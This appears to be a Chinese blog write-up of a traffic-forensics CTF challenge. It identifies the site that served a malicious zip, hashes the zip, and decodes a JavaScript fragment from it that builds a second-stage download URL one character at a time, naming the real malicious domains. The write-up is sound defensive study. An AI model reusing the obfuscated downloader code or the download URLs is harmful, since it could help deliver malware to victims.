题目地址:https://xj.edisec.net/challenges/58
1.下载数据包文件 hacker1.pacapng,分析恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么将该 URL作为 FLAG 提交 FLAG(形式:flag{www.baidu.com}) (无需 http、https);
追踪流-http流,发现第三次请求时,返回了200,且返回包是压缩文件
GET /w0ks//?YO=1702920835 HTTP/1.1
Host: tsdandassociates.co.sz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://tsdandassociates.co.sz/w0ks/?92444881
Accept-Encoding: gzip, deflate
Accept-Language: en
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Dec 2023 17:33:59 GMT
Content-Type: application/octet-stream
Content-Length: 85834
x-powered-by: PHP/7.4.33
content-description: File Transfer
content-disposition: attachment; filename=TD.zip
content-transfer-encoding: binary
expires: 0
cache-control: must-revalidate, post-check=0, pre-check=0
pragma: public
x-turbo-charged-by: LiteSpeed
PK.........j.WP.E.............yUT ..,F.elE.eux...................d...c:.8%...C-..../v.}&...Be..... ...E.O?Xd.(....7......9.guq...Wb...rTw.4....){...D...3,...l...7`....
..r{D.........T.,.............u.px..<..Q&.e.
所以看到Referer地址即为flag
flag{tsdandassociates.co.sz/w0ks/?92444881}
2.下载数据包文件 hacker1.pacapng,分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG(形式:flag{md5});
导出对象-http,选择返回成功的请求,即问题1的?YO=1702920835
另存为1.zip
计算md5
C:\Users\admin\Downloads>certutil -hashfile 111.zip MD5
MD5 的 111.zip 哈希:
f17dc5b1c30c512137e62993d1df9b2f
CertUtil: -hashfile 命令成功完成。
flag{f17dc5b1c30c512137e62993d1df9b2f}
3.下载数据包文件 hacker1.pacapng,分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序, 该域名是什么?提交答案:flag{域名}(无需 http、https)
从流量包中保存的zip文件,解压后发现Nuj.js有字符串拼接的代码
其中一段如下
o457607380 = '';
o457607380+='h';
o457607380+='t';
o457607380+='t';
o457607380+='p';
o457607380+='s';
o457607380+=':';
o457607380+='/';
o457607380+='/';
o457607380+='s';
o457607380+='h';
o457607380+='a';
o457607380+='k';
o457607380+='y';
o457607380+='a';
o457607380+='s';
o457607380+='t';
o457607380+='a';
o457607380+='t';
o457607380+='u';
o457607380+='e';
o457607380+='s';
o457607380+='t';
o457607380+='r';
o457607380+='a';
o457607380+='d';
o457607380+='e';
o457607380+='.';
o457607380+='c';
o457607380+='o';
o457607380+='m';
o457607380+='/';
o457607380+='A';
o457607380+='6';
o457607380+='F';
o457607380+='/';
o457607380+='6';
o457607380+='1';
o457607380+='6';
o457607380+='2';
o457607380+='3';
o457607380+='1';
o457607380+='6';
o457607380+='0';
o457607380+='3';
l988241708 = '';
l988241708+='q';
l988241708+='u';
l988241708+='i';
l988241708+='.';
l988241708+='q';
即:https://shakyastatuestrade.com/A6F/616231603
推测此为外连地址
flag{shakyastatuestrade.com}
因为对js不熟,第三题仅仅是知其然而不知其所以然,还仍需学习
扫一扫
212
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
